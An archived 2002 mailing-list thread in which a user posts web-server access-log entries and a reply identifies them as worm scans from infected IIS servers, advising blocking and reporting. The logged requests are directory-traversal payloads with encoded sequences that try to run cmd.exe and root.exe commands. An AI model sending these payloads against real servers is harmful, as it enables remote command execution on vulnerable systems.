Re: access_log?


Subject: Re: access_log?
From: SFaulken (sfalken@citlink.net)
Date: Tue Jan 22 2002 - 22:11:57 MST


That's called an infected Microsloth IIS server, about all you can do is
start blocking the IP's, and report them to their ISP's if you're nice =]

                --SF

On Tuesday 22 January 2002 08:39, Jon wrote:
> I found something weird in my access log. I'm guessing someone here can
> tell me what's going on?
>
>
> Over and over again at different IP's...DOS?
> ===============
> 24.128.125.199 - - [20/Jan/2002:13:45:41 -0500] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 276
> 24.128.125.199 - - [20/Jan/2002:13:45:41 -0500] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 274
> 24.128.125.199 - - [20/Jan/2002:13:45:41 -0500] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.125.199 - - [20/Jan/2002:13:45:42 -0500] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.125.199 - - [20/Jan/2002:13:45:42 -0500] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.125.199 - - [20/Jan/2002:13:45:42 -0500] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 315
> 24.128.125.199 - - [20/Jan/2002:13:45:43 -0500] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 315
> 24.128.125.199 - - [20/Jan/2002:13:45:43 -0500] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
>y stem32/cmd.exe?/c+dir HTTP/1.0" 404 331
> 24.128.125.199 - - [20/Jan/2002:13:45:43 -0500] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.125.199 - - [20/Jan/2002:13:45:43 -0500] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.125.199 - - [20/Jan/2002:13:45:44 -0500] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.159.4.118 - - [20/Jan/2002:13:48:27 -0500] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 276
> 24.159.4.118 - - [20/Jan/2002:13:48:27 -0500] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 274
> 24.159.4.118 - - [20/Jan/2002:13:48:27 -0500] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.159.4.118 - - [20/Jan/2002:13:48:36 -0500] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.159.4.118 - - [20/Jan/2002:13:48:37 -0500] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.159.4.118 - - [20/Jan/2002:13:48:37 -0500] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 315
> 24.159.4.118 - - [20/Jan/2002:13:48:37 -0500] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 315
> 24.159.4.118 - - [20/Jan/2002:13:48:37 -0500] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
>y stem32/cmd.exe?/c+dir HTTP/1.0" 404 331
> 24.159.4.118 - - [20/Jan/2002:13:48:37 -0500] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.159.4.118 - - [20/Jan/2002:13:48:46 -0500] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.159.4.118 - - [20/Jan/2002:13:48:47 -0500] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.159.4.118 - - [20/Jan/2002:13:48:47 -0500] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.159.4.118 - - [20/Jan/2002:13:48:47 -0500] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.159.4.118 - - [20/Jan/2002:13:48:47 -0500] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.159.4.118 - - [20/Jan/2002:13:48:47 -0500] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.159.4.118 - - [20/Jan/2002:13:48:47 -0500] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:14:11:50 -0500] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 276
> 24.128.57.12 - - [20/Jan/2002:14:11:53 -0500] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 274
> 24.128.57.12 - - [20/Jan/2002:14:11:57 -0500] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.57.12 - - [20/Jan/2002:14:12:00 -0500] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.57.12 - - [20/Jan/2002:14:12:04 -0500] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:14:12:07 -0500] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 315
> 24.128.57.12 - - [20/Jan/2002:14:12:10 -0500] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 315
> 24.128.57.12 - - [20/Jan/2002:14:12:13 -0500] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
>y stem32/cmd.exe?/c+dir HTTP/1.0" 404 331
> 24.128.57.12 - - [20/Jan/2002:14:12:17 -0500] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:12:20 -0500] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:12:24 -0500] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:12:27 -0500] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:12:31 -0500] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.57.12 - - [20/Jan/2002:14:12:34 -0500] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.57.12 - - [20/Jan/2002:14:12:38 -0500] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:14:12:41 -0500] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:14:28:01 -0500] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 276
> 24.128.57.12 - - [20/Jan/2002:14:28:05 -0500] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 274
> 24.128.57.12 - - [20/Jan/2002:14:28:09 -0500] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.57.12 - - [20/Jan/2002:14:28:13 -0500] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.57.12 - - [20/Jan/2002:14:28:16 -0500] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:14:28:20 -0500] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 315
> 24.128.57.12 - - [20/Jan/2002:14:28:24 -0500] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 315
> 24.128.57.12 - - [20/Jan/2002:14:28:28 -0500] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
>y stem32/cmd.exe?/c+dir HTTP/1.0" 404 331
> 24.128.57.12 - - [20/Jan/2002:14:28:31 -0500] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:28:35 -0500] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:28:39 -0500] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:28:42 -0500] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:28:45 -0500] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.57.12 - - [20/Jan/2002:14:28:49 -0500] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.57.12 - - [20/Jan/2002:14:28:53 -0500] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:14:28:56 -0500] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:14:36:23 -0500] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 276
> 24.128.57.12 - - [20/Jan/2002:14:36:27 -0500] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 274
> 24.128.57.12 - - [20/Jan/2002:14:36:31 -0500] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.57.12 - - [20/Jan/2002:14:36:35 -0500] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.57.12 - - [20/Jan/2002:14:36:38 -0500] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:14:36:42 -0500] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 315
> 24.128.57.12 - - [20/Jan/2002:14:36:45 -0500] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 315
> 24.128.57.12 - - [20/Jan/2002:14:36:49 -0500] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
>y stem32/cmd.exe?/c+dir HTTP/1.0" 404 331
> 24.128.57.12 - - [20/Jan/2002:14:36:52 -0500] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:36:59 -0500] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:37:03 -0500] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:37:06 -0500] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:14:37:10 -0500] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.57.12 - - [20/Jan/2002:14:37:13 -0500] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.57.12 - - [20/Jan/2002:14:37:17 -0500] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:14:37:21 -0500] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:15:20:04 -0500] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 276
> 24.128.57.12 - - [20/Jan/2002:15:20:07 -0500] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 274
> 24.128.57.12 - - [20/Jan/2002:15:20:11 -0500] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.57.12 - - [20/Jan/2002:17:03:25 -0500] "GET /scripts/root.exe?/c+dir
> HTTP/1.0" 404 276
> 24.128.57.12 - - [20/Jan/2002:17:03:28 -0500] "GET /MSADC/root.exe?/c+dir
> HTTP/1.0" 404 274
> 24.128.57.12 - - [20/Jan/2002:17:03:32 -0500] "GET
> /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.57.12 - - [20/Jan/2002:17:03:35 -0500] "GET
> /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 284
> 24.128.57.12 - - [20/Jan/2002:17:03:39 -0500] "GET
> /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:17:03:42 -0500] "GET
> /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 315
> 24.128.57.12 - - [20/Jan/2002:17:03:45 -0500] "GET
> /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
> HTTP/1.0" 404 315
> 24.128.57.12 - - [20/Jan/2002:17:03:49 -0500] "GET
> /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s
>y stem32/cmd.exe?/c+dir HTTP/1.0" 404 331
> 24.128.57.12 - - [20/Jan/2002:17:03:52 -0500] "GET
> /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:17:03:56 -0500] "GET
> /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:17:03:59 -0500] "GET
> /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:17:04:03 -0500] "GET
> /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 297
> 24.128.57.12 - - [20/Jan/2002:17:04:06 -0500] "GET
> /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.57.12 - - [20/Jan/2002:17:04:09 -0500] "GET
> /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 281
> 24.128.57.12 - - [20/Jan/2002:17:04:12 -0500] "GET
> /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298
> 24.128.57.12 - - [20/Jan/2002:17:04:16 -0500] "GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298



This archive was generated by hypermail 2a24 : Tue Jan 22 2002 - 22:14:55 MST